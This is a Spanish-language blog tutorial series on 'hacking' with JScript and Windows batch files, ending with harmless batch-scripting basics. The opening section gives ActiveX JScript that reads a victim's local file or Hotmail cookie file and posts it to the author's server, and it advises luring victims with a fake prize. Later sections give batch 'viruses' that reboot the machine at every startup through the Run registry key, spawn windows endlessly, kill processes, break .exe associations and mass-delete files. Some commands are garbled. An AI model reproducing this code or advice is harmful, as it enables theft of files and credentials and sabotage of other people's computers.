Hacking con JScript

Lo que vamos a lograr con este Tutorial es algo parecido a un XSS (En el caso de querer Robar cookies o algun archivo del HD) Tambien veremos como tener control de alguna aplicacion de nuestra victima e intentaremos sacar informacion de alguno de sus atchivos y lo mandaremos a nuestro servidor.

• Pare esto Nescesitaremos un servidor les recomiendo mucho el de Mi@
• Conocimientos basicos en JScript
• Editor para paginas web en HTLM (Podemos usar el Bloc de Notas)

Tengo que mencionar que esta vulnerabilidad solo funciona con el navegador Internet Explorer y Similares

El Lenguaje JavaScript sirver para reducir la libertad del usuario en nuestras paginas web,Aun que en si no podamos colocar nunguna operacion realmente peligrosa, Salvo explotando Bugs del los navegadores.En Cambio JScript es una Implementacion de JavaScript que funciona en los Navegadores como internet Explorer,Lo que caracteriza a Jscript es que puede Sacar Muchas mas Operaciones que JavaScript y permite interactuar con Windows con ActiveX lo cual nos da un gran poder sobre la Maquina,Pasemos a lo Interesante:

Robando Informacion en C:\

Empezemos..Abran su Editor HTLM y coloquen el Siguiente Codigo dentro de los Targets
<Html> </Html>

<html>
<body>
<form name=f method=post action=prueba.htm>
<input type=hidden name=datos>
</form>
<script Language=JScript>
var obj = new ActiveXObject("Scripting.FileSystemObject");
var file = obj.GetFile("C:\prueba.txt");
var stream = file.OpenAsTextStream(1, -2);
var line = stream.ReadLine();
document.f.datos.value = line;
stream.Close();
document.f.submit();
</script>
</body>
<center><code><h1>www.TheRarioBlog.blogspot.com</h1></code>
</html>


Siempre que IE va a leer un texto JScript te pide si estas seguro que puede ser dañiño etc... dile a tu victima que es una descarga o algo inventale un "premio" utiliza tu imaginacion.

Si acepto leer la pagina con el codigo de arriba como ejemplo acabas de extraer lo que se encuentra en la ubicacion C:\\prueba.txt y copiar todo el contenido a tu servidor en la pagina prueba.htm,este es un Sencillo ejemplo de lo que puedes hacer con JScript ... bien puedes sacarle el archivo C:\Documents and Settings\usuario\cookies\usuario@hotmail.msn[1].txt y sacarle el usuario de hotmail (donde dice usuario debes de cambiarle al nombre de la sesion de su PC)

Los Virus en Batch II

Ahora crearemos un Virus “Mortal” para una PC de alguien. Esta es la base del Virus:

@Echo Off
Title Apagar
shutdown -r -f -t 5
exit

Este Código apagara la Computadora en 5 Segundos.
Pero Imaginense Que se Ejecute cada vez que La PC se prenda…
Pues eso es lo que Aremos

Lo Primero que Tenemos que Hacer es Crearlo en una Carpeta Escondida para el Ojo Humano Mortal.

Despues Agregarlo al Registro en RUN

Y Eso se logra Asi:

@echo off
CD C:\Windows\system32
Echo @echo off > virus.bat
Echo .
Shutdown -r -s -t 5 >> virus.bat
Echo Exit >> virus.bat
Exit

Entienden lo Que Hemos Hecho no? Pues si No Vuelvan a Leer todo los post de batch desde el Principio y Frente a una PC.

Ahora solo tenemos que Agregarlo al Registro y eso se Hace Asi:

reg add hkey_local_machine\software\microsoft\windows\curr entversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f

Y Listo Ya tenemos su Primer Virus.

Los Virus en Batch

Hola Todos. Primero antes que Nada déjenme Explicarles el Comando :

Shutdown Este Comando Puede Variar de los Attributos que lo Acompañen
-R Se reiniciara el Equipo
-s Se Apagara el Equipo
-F Se apagara Forzosamente
-t Indica el Tiempo en el que se apagara la PC
-c Puedes Incluir un Mensaje

Ahora si Empecemos.

Empezemos con Algo Basico…

Un Bucle
Un Bucle es un Virus que Abrira ventanas o Programas hasta que los cierres
Ejemplo:

@Echo Off
Title Bucle
Goto Bucle
:Bucle
Start TheRarioBlog.Blogspot.Com
Goto Bucle

Imaginense lo que Pasa, Pobre tipo si no lo logra cerrar al principio del bucle tendrá que reiniciar.

Un Matador de Procesos
Lo que Aremos es Eliminar el MSN y Apagar la PC En 10 Segundos con el Mensaje: Muajajajajajajajajajajajajaja

@Echo Off
TaskKill /F /I Msnmsgr.exe
Shutdown –s –t 10 –c “Muajajajajajajajajajajajajaja”


El Clásico Chinga PC’S con Vacuna
Ahora con este nos Desharemos de los .Exe (no de forma permanente)

@Echo Off
Title Chinga PC’S
Assoc* .exe=.Rario


*Ese comando Hace que Los .Exe se Traten de Abrir como .Rario que no Existe para arreglarlo vuelve a ascociar un .exe con el .exe (si lo vas a probar trae la vacuna en una USB ya que no puedes abrir el bloc o créala antes

Mas Comandos

En el Próximo Post Nos adentraremos en La introducción a los Virus. Así que tengo que empezar a enseñarles comandos relacionados a aplicaciones y virus. Empecemos.

Estos son Los Comandos Básicos a Recordar

DEL Borra Archivos. Por Ejemplo:

@Echo Off
Title Borrar
Del /Q /S /F C:\Windows\System32\Rario
Exit

Aquí Estoy Eliminando La Carpeta Rario del System32.
Del Tiene Sub-Comandos Por Decirlo Así que Hacen Esto:

\P Pide Confirmación Para Borrar
\Q Modo Silencioso (No Pide Confirmación)
\F Fuerza Bruta… También Borra Archivos de Solo Lectura
\S Borra También los Subdirectorios

Start Ejecutas un Archivo o Abres una Pagina web Ejemplo:

@Echo Off
Title Blog
Start TheRarioBlog.Blogspot.Com
Exit

Este Comando Abriria Mi Pagina Web con Tu Explorador Predeterminado

TaskKill Mata un Procesó (/F Fuerza Bruta)
Format (Unidad) Formateas un Disco Duro
Msg* Abre una Ventana con Un Mensaje.
Reg Add Añade una Entrada al Registro
> Crea un Archivo
>> Se Salta hasta la Ultima Linea del Archibo e Incluye lo Que Desee
Ejemplo:

@Echo Off
Title TXT
Echo TheRarioBlog.blogspot.com>C:\Rario.txt
Con este Comando se crea un .TXT con mi Pagina en C:\

* Substituye Cualquier Archivo Posible Ejemplo:

@Echo Off
Title Substituir
Del /Q /f *.JPEG
Exit

Esto Elimina TODOS los Archivos JPEG

? Substituye una Letra Ejemplo:

@Echo Off
Title Substituir II
Del /Q /f AB?.*
Exit

Esto Eliminara Todos los Archivos Con El Nombre AB y Cualquier Otro Carácter.

CHDIR o CD Cambia al Directorio Indicado

CD C:\Windows Te Envía a la Carpeta Windows o la Deseada
CD.. Ir al Directorio Superior
CD\\ Ir a la Raiz

ATTRIB Muestra y te Permite Cambiar los Atributos del Archivo Indicado Ejemplo:

@Echo Off
Title Attrib
Attrib C:\Rario (Digamos que me dice que esta Oculto)
Attrib C:\Rario -H

Con El Parametro /S Buscas Tambien en Subdirectorios.

Los atributos son:
H = Oculto
R = Lectura
S = Sistema.
A = Modificado.
Se activan o Desactivan con el Simbolo + o – Antes de la Letra

Estos y Los comandos que as Vistos son Comandos Básico Ahora es Hora de pasar a los Virus.

Introducir Datos en Batch

Ahora explicare como Poder hacer un Questionaro por decirlo así ya que el siguiente comando tiene muchos usos.
Ahora pondré un pequeño ejemplo con Comandos mas Avanzados. Que Sera Explicado a continuacion

REM Ustedes Escriban esto en Minúsculas ya que es Sensitivo
@Echo Off
Title Ejemplo Datos
Set Var=Hacker
Echo.
Color C
Echo Quieres Ser un %Var%
Echo.
Pause
Rem ---Hasta aquí Todo Bien no?---
Goto Datos

:Datos
Color A
Cls
Echo.
Set/p Rario= Si o No?:
If %Rario%==Si Goto Hacker
If %Rario%==si Goto Hacker
Rem ------Ponlo asi por que es sensitivo a las Mayusculas---
If %Rario%==No Goto Loser
If %Rario%==no Goto Loser

:Error
Rem –-- Si pone algo diferente automáticamente es enviado a la siguiente sección---
Echo -------------------
Echo ERROR Introduce Si o No
Echo -------------------
Pause
Goto Datos

:Hacker
Cls
Echo O Yeah!!
Echo Asi se hace =D
Pause null
Exit

:Loser
Cls
Echo =( Entonces para que lees esto
Pause Null
Goto Datos

Lo de Arriba fue un Ejemplo Avanzado y muy corto…
Así que Prepárense. Ahora explicare que Hacen Todos los Nuevos Comandos

: Este Pequeño Comando te Sirve para Separar el Codigo en Secciones

GOTO Sirve para Cambiar entre Secciones

Set\P %Var%= Sirve para Que el Usuario incluya una variable al programa un Ejemplo de su Uso Mas común para los Novatos:

@Echo Off
Title Ejemplo Miscelaneo
Set\P Nombre=Cual es tu Nombre?:
Pause
Echo.
Echo Tu Nombre es %Nombre%
Pause null
Exit

Logrando Introducir una Variante directamente desde El programa.

IF Este Comando es Complicado. Primero empecemos Viendo los de IF*.
(Todos Los Atributos deben Tener IF Primero)

%Variable%==Valor (Comando) **
Esto Hace que Si el Valor de la Variable es Igual al Introducido se Procese un Comando

%Variable% LSS Valor (Comando)
Solo para Valores Numéricos. Si el Valor es menor al Introducido va a Procesar el Comando

%Variable% GTR Valor (Comando)
Solo para Valores Numéricos. Si el Valor es Mayor al Introducido va a Procesar el Comando

%Variable% LEQ Valor (Comando)
Solo para Valores Numéricos. Si el Valor es menor o Igual al Introducido va a Procesar el Comando

%Variable% GEQ Valor (Comando)
Solo para Valores Numéricos. Si el Valor es Mayor o Igual al Introducido va a Procesar el Comando

*También Existe el Comando IF NOT Que hace lo Contrario. (IF= SI… IF NOT= Si No..)
**También Tengo que Decir que Si pones el Primer comando entre Paréntesis y Después ELSE y otro comando Si el Primer Comando no se Puede Procesar se Procesara el Segundo

Variables en Batch

Espero que lo de Abajo les haiga quedado lo suficientemente claro ya que fue muy sencillo no? Les recomiendo que Escriban usando solamente Minúsculas. Empecemos.
¿Que es una Variable?
Una Variable es un tipo de dato que puede ser introducido y recordado dentro de la memoria de la PC.
Vamos a poner un Pequeño Ejemplo:
@Echo Off
Title Ejemplo Variable
Set Var=Hacker
Echo Quieres Ser un %Var%
Pause
Exit
Guárdenlo Como un .BAT y vean lo que hace. Las variables tienen muchas formas de ser usadas y son necesarias en cualquier programa de computadora avanzado… y también para los simples.
Ahora a explicar lo que paso Arriba.
Al Poner el Comando:
Set Var=Hacker
Ponemos La Variable Var (puede ser llamada como sea) como Hacker para que cuando ocupemos mostrar la Variable pongamos el nombre de ella entre %% en este caso %Var% se muestre la Palabra Hacker.
Hagan un pequeño .BAT con dos Variables y sigamos a el siguiente Post.

Aprendiendo un Poco de Batch

Hola todos. Para empezar a programar en batch empezaremos por lo más básico. El Clásico HELLO WORLD.
Para empezar habran el Bloc de Notas o como recomiendo yo instalen (o descarguen) el Notepad C++ Ahora lo primero que se debe hacer en un código batch es lo siguiente:

@Echo Off
Así es como empezaremos cualquier código seguido del titulo:
Title (El Titulo Que le Quieras Poner)
---
*Color A
Esto es Opcional, Cambia el color de las letras a verde si quieres saber que colors hay y su código Abre la consola (Menu de inicio-Ejecutar-Cmd) y teclea Color\?,Poniendo dos Seguidos Pones el Color Del Fondo y del Texto.

Ahora les Mostrare Una serie de comandos que tienen que tienen que recordar para por lo menos tener una noción básica de Batch

ECHO. Esto deja un espacio en el texto
ECHO Con esto muestras algún mensaje en el programa
REM Dejas un Comentario en el Codigo
PAUSE Pausas el Código pero dice Presiona enter para Continuar
PAUSE >Null Pausas pero no Dice nada presiona enter para continyar

Ahora Copien este Ejemplo en el Bloc de Notas

Ejemplo:

@Echo Off
Color A
Rem ------------ Texto -------------
Echo Hello World
Echo.
Pause
CLS
Rem -------- Cambiando a Rojo ----------
Color 4
Echo Funciono No?
Pause > null

Ahora Hagan un Guardar como y Guarden: Ejercicio 1.BAT Se va a guardar como un Icono Blanco con un Engrane no? Ejecútenlo y Traten de Comprender lo de arriba. En la Segunda Edición explicare como cambiarlo a .exe y cambiarle el icono.
Para terminar esta Lección Creen su propio programa con Todos los comandos mencionados hasta ahora y Hagan que cuente una pequeña historia.